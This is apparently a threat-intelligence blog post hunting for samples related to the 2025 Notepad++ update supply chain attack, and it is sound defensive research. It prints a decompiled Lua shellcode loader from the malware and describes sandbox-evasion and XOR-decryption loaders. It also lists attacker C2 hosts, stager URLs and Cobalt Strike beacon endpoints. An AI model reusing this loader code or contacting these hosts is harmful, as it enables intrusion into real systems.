Notepad++ supply chain attack related samples

• 2026 February 12
• notepad++
• malware
• kaibou search services
• china
• metasploit

In this report, we use our Kaibou Search Services to find related samples to the Notepad++ supply chain attack that happened between 2025-06 and 2025-12. During the analysis we uncover 14 new similar samples and 11 new stager URLs related to the threat actor.

If you are already familiar with the attack, skip to our contribution.

Attack overview #

On October 23, 2025 a Notepad++ user reported suspicious activity related to the automatic update or Notepad++. The acivity involved acquiring information about the host system and uploading it to https://temp.sh, a file storage provider.

Up until December 9, 2025, more Notepad++ users reported that some update requests were redirected to external servers and trojanized executables were downloaded to their systems. This could be done because the update mechanism didn't verify cryptographic signatures on the downloaded binaries, so a Man-in-the-Middle (MitM) attacker in the right place could serve any file they wanted. On December 1, certificate verification was added to the update mechanism (wingup commit, Notepad++ commit).

February 2, 2026 Don Ho, the main author of Notepad++ published a blogpost about the security incidents happening between June and December 2025. As per the excellent overview from Costin Raiu, the attackers leveraged the shared hosting infrastructure at Hostinger to attack Notepad++ specifically. They probably compromised another site, hosted on the same server to execute code, then utilized an exploit (maybe CVE-2025-6018) to elevate their privileges, maybe modify the Notepad++ update script (https://notepad-plus-plus.org/update/getDownloadUrl.php) to redirect users to attacker controlled domains. A good illustration about the network traffic is shown in the followup blog by Kenneth Kinion and Elliot Roe from Validin. On 2025-09-02 Hostinger updated the kernel and firmware of the server and so the original attack vector was eliminated. But the attackers could still meddle with the notepad++ update traffic, probably through suo5 PHP tunnels.

Based on techniques used during the attack the events are attributed to a Chinese APT group, Lotus Blossom. The information so far suggests that they first fingerprinted many compromised hosts with netstat, systeminfo, tasklist and whoami commands and later decided what hosts are worth infecting further. Too many infections increase the risk of discovery.

Samples included in the attacks #

The first analysis report was published by Ivan Feigl from Rapid7, it's an excellent, detailed deep-dive into the samples they analyzed, including Chrysalis backdoor. The following day, Georgy Kucherin and Anton Kargin from Kaspersky published a blog post about what they saw in their telemetry. We highly encourage everyone to read both reports for in depth understanding of the execution chains.

The Rapid7 report corresponds to Chain 3 in the Kaspersky blog.

Hostinger also published a short blog about the attack. Additional IoCs have been added to notepad++ site on 2026-02-05. This contains some IP addresses, HTTP User Agents and a few PHP files and their hashes. None of these are available in public databases.

Hunting for similar samples in Kaibou Search Services #

Let's try to expand on the known samples using our malware repository. We'll follow Kaspersky's order of chains. For every sample we'll check if they are available in our database. For this, we only need an MD5, SHA1 or SHA256 hash. SHA256 is used in Rapid7 report, SHA1 is used in Kaspersky. In order to perform similarity search to a sample, we need it's TLSH digest. This is almost never published in reports, so we need to obtain it from other sources (e.g. VirusTotal, MalwareBazaar or our database, Kaibou).

We use the following abbrevations:

• VT = VirusTotal
• KTIP = Kaspersky Threar Intelligence Portal
• KSS = Kaibou Search Services
• 012345...abcdef = SHA256 hash that begins with 012345 and ends with abcdef

Chain 1 #

As none of the samples are in our database or VT and Kaspersky doesn't use TLSH hashes, we cannot search for these. 🤷

Chain 2 #

Finally, the 6th update.exe, the October 2025 version of Chain 2 is available in our database. Similarity search results in 2 additional samples.

As mentioned in the Kaspersky report lua5.1.dll, script.exe and alien.dll are legitimate and alien.ini contains a LUA 5.1 compiled script. The first 64 bytes of the file look like this, it is indeed LUA 5.1, so we can decompile it with luadec:

00000000: 1b4c 7561 5100 0104 0404 0800 2700 0000  .LuaQ.......'...
00000010: 4043 3a5c 5573 6572 735c 4a6f 686e 5c44  @C:\Users\John\D
00000020: 6573 6b74 6f70 5c77 6c75 615c 6f75 7470  esktop\wlua\outp
00000030: 7574 2e6c 7561 0000 0000 0000 0000 0000  ut.lua..........

scc = ""
package.cpath = "./?.dll"
core = require("alien.core")
k32 = (core.load)("Kern" .. "el32")
u32 = (core.load)("Use" .. "r32")
len = (string.len)(scc)
va = k32.VirtualAlloc
vl = k32.VirtualLock
rmm = k32.RtlMoveMemory
es = u32.EnumWindowStationsW
va:types({"int", "int", "int", "int"; ret = "int", abi = "stdcall"})
vl:types({"int", "int"; ret = "int", abi = "stdcall"})
rmm:types({"int", "string", "int"; ret = "int", abi = "stdcall"})
es:types({"int", "int"; ret = "int", abi = "stdcall"})
ptr = va(0, len, 12288, 64)
vl(ptr, len)
rmm(ptr, scc, len)
es(ptr, 0)

The decompiled code just loads a shellcode to memory and calls User32:EnumWindowStationsW(scc, 0). As per the Microsoft docs, the first argument is a EnumWindowStationProc callback function. The shellcode itself is most likely an msfvenom windows/custom/reverse_http 32-bit payload (source code reverse_http.rb) that uses Wininet to download the next stage.

Extracting the LHOST, LPORT, LURI and HTTP headers from the payload is fairly easy. These values match the ones for September-October chain 2.

{
    "path": "/help/Get-Start",
    "http_headers": [
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.5",
        "Connection: close",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
    ],
    "domain": "safe-dns.it.com",
    "port": 443,
    "protocol": "https"
}

NSIS installer also sets the creation date for extracted files. We can deduct, that the first LUA-based archive was probably constructed at 2025-08-18 07:59:14+01:00 because the lua5.1.dll probably didn't change across versions, just the alien.ini payload did. This payload was created at 2025-09-22 09:25:48+01:00.

Name       Length CreationTime           LastWriteTime          LastAccessTime        
----       ------ ------------           -------------          --------------        
a.txt       16901 2026. 02. 09. 19:16:13 2026. 02. 09. 19:16:16 2026. 02. 09. 19:16:16
alien.dll   26112 2018. 01. 30. 19:27:40 2018. 01. 30. 19:27:40 2026. 02. 09. 19:16:28
alien.ini    2093 2025. 09. 22. 9:25:48  2025. 09. 22. 9:25:48  2026. 02. 09. 19:16:28
lua5.1.dll 163840 2025. 08. 18. 7:59:14  2025. 08. 18. 7:59:14  2026. 02. 09. 19:16:28
script.exe  45056 2025. 08. 18. 7:58:32  2025. 08. 18. 7:58:32  2026. 02. 09. 19:16:27

This sample drops the same LUA components as all other samples using LUA, except for the script payload alien.ini. The decompiled LUA codes only differ in a single line, that sets the library search path:

< package.cpath = "./?.dll"
---
> package.cpath = (arg[0]):match(".*\\") .. "?.dll;" .. package.cpath

The contained shellcode is exactly the same as in the previous similar version:

6b780cf1def14589f7b9d5835f05d24fa2443b6524851f386ec3c9379af68cc6  ./33e660_shellcode
6b780cf1def14589f7b9d5835f05d24fa2443b6524851f386ec3c9379af68cc6  ./cd88f4_shellcode

The timestamps of the legitimate files are the same as before, but here alien.ini was created 1 month later, than the previous one, at 2025-10-21 07:54:40+01:00.

Name       Length CreationTime           LastWriteTime          LastAccessTime        
----       ------ ------------           -------------          --------------        
a.txt       17349 2026. 02. 09. 19:00:02 2026. 02. 09. 19:00:04 2026. 02. 09. 19:00:04
alien.dll   26112 2018. 01. 30. 19:27:40 2018. 01. 30. 19:27:40 2026. 02. 09. 19:00:16
alien.ini    2193 2025. 10. 21. 7:54:40  2025. 10. 21. 7:54:40  2026. 02. 09. 19:00:17
lua5.1.dll 163840 2025. 08. 18. 7:59:14  2025. 08. 18. 7:59:14  2026. 02. 09. 19:00:16
script.exe  45056 2025. 08. 18. 7:58:32  2025. 08. 18. 7:58:32  2026. 02. 09. 19:00:16

Chain 3 #

There are no similar samples to this one in our database.

Similarity search to log.dll with a threshold of 40 resulted in 89733 similar files. 430 of these were uploaded into Kaibou later than 2025-06-01. After some manual analysis we found that the similarity comes from the CRT functions. They occupy most part of the binary. The actual functions written by the authors occupy much smaller space in the binary. So while the binary similarity (that TLSH tries to detect) is correct, none of the samples have similar functionality.

Similarity searching for the encrypted shellcode (BluetoothService) is useless as it has 7.999 entropy.

Rapid7 found additional malicious files on the infected server under C:\ProgramData\USOShared directory. conf.c contained a small shellcode loader that downloads and executes the next stage. The shellcode loads Wininet.dll using LoadLibraryA, and uses InternetConnectA and HttpSendRequestA from it to download a file from a specific host with custom headers. The next stage was a Cobalt Strike Beacon.

The loader samples below were found by Rapid7 in public databases and are similar to the one observed during the incident.

As all the loaders are available either in our database or VirusTotal, we can perform similarity searches to them. There are no additional similar samples to loaders 1 and 4.

There are 23 samples in KSS similar to loader 2 (e7cd60...1c6eda). Let's have a closer look! All of them are x64 PE files. The function at 0x401630 posts a message to the current thread and peeks it immediatelly, checking that the values arrived correctly. If they did, it checks the elapsed time after a sleep(650). These are common sandbox / emulation detection techniques. If all is well, it allocates a heap buffer, copies the encrypted shellcode to it and calls DecryptAndExecuteShellcode (at 0x401595).

Shellcode decryption is just a XOR with the fixed 4 byte global key. Then the shellcode is executed using CreateThread.

We note that the WriteModuleHandleRefAndGetProcAddress function (at 0x401563) has no effect in this sample. It would write the address of GetModuleHandleA and GetProcAddress to the shellcode at offsets from DAT_0040302c and DAT_00403030 global variables. But these are 0 in this sample. We think that this loader may be used with other shellcode payloads, that need these functions.

Of the 23 similar samples returned by KSS:

• 12 are only similar because of CRT
• 11 implement the exact same functionality with different payloads

The samples all have the same size as loader 2 from Rapid7 blog. Similarity can also be observed on their image representations with Hilbert curves.

Manual analysis of the related samples prove the similarity. For example e7cd60... (loader 2) and 055f7f... only differ in CheckSum in ImageOptionalHeader and G_SHELLCODE_LEN, G_XOR_KEY and G_ENCRYPTED_SHELLCODE global variables. As the original loader is thought to be a custom loader implementation (not a generic, available thing like Metasploit payloads or Cobalt Strike), these similar samples can point us to additional previous targets by the same attacker.

The payloads are similar msfvenom windows/x64/custom/reverse_http shellcodes using wininet functions to load the next stage, so we can extract the LHOST, LPORT, LURI and HTTP headers just like before. Their original source code is available in github metasploit-framework reverse_http_x64.rb. From the shellcodes, we extracted the following configuration:

Extracted IP addresses categorized by AS:

So if the code used for loader 2 is truly uniquely used by only this threat group (believed to be Lotus Blossom), we now know that they've been using this stager with different shellcode configurations since at least 2022-03, with the above IP addresses.

We queried all URLs with the provider parameters and hxxp[://]81.70.37.146:80/4l5C3VMo was live (at 2026-02-12 10:34:58+01:00) and returned the following file:

After analysis, we found that this is a file very similar to the one detailed in Analysis of conf.c section of Rapid7 report. In the beginning, it does the same rolling XOR-based decryption:

The decrypted stage contains a similar section encrypted with CRAZY XOR key. It is a Cobalt Strike (CS) HTTPS beacon with the following configuration:

http-get: 81.70.37.146/api/getBasicInfo/v1
http-post: 81.70.37.146/api/Metadata/submit
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4472.114 Safari/537.36

loader 3 #

There are 3234 similar samples to loader 3 in our database. 1120 of these are newer than 2025-01-01. As the original loader 3 was uploaded to VirusTotal on 2025-03-27, we only processed these newer samples. None of them contained the string clipc.dll. There are 20 that used function NtQuerySystemInformation, we checked these manually but none of them contained similar code snippets as the one highlighted in the Rapid7 report.

Future work #

As mentioned in the Rapid7 analysis, the Chrysalis backdoor doesn't seem like a throwaway tool. It would be worth a research to replicate the attack sequence in a virtual environment, debug log.dll until BluetoothService shellcode is loaded, decrypted, jumped on and the main Chrysalis module is decrypted. At this stage, the decrypted module could be dumped from memory. A similarity search might produce additional variants from Kaibou, who knows. Hit me up if you are interested: csongor.tamas@ukatemi.com

The NSIS installer containing everything can be downloaded from MalwareBazaar

If you are interested in getting access to Kaibou Search Services and the 800+ million files within, reach out at kss@ukatemi.com.

IoCs #

hostinger-files.csv
hostinger-ips.txt
kaspersky-files.csv
kaspersky-urls.txt
rapid7-files.csv
rapid7-urls.txt
ukatemi-files.csv
ukatemi-urls.txt

Links #

2025-10-23: Notepad++ forum post about suspicious update activity
2025-11-30: wingup commit to add signature verification
2025-12-01: Notepad++ commit to add signature verification
2025-12-09: Notepad++ announcement about vulnerability fix
2025-12-09: Notepad++ v8.8.9 update includes vulnerability fix
2026-02-02: Notepad++ post announcing the incident
2026-02-05: IoCs from Hostinger
2026-02-02: Rapid7 blog about malicious toolkit used during the attack
2026-02-03: Kaspersky reports what they uncovered from their telemetry
2026-02-03: Validin about the C2 infrastructure
2026-02-03: Hostinger report about the incident
2026-02-04: Blog by Costin Raiu

• Previous post: Phantom Taurus related samples

Want to message us? Contact us: blog@ukatemi.com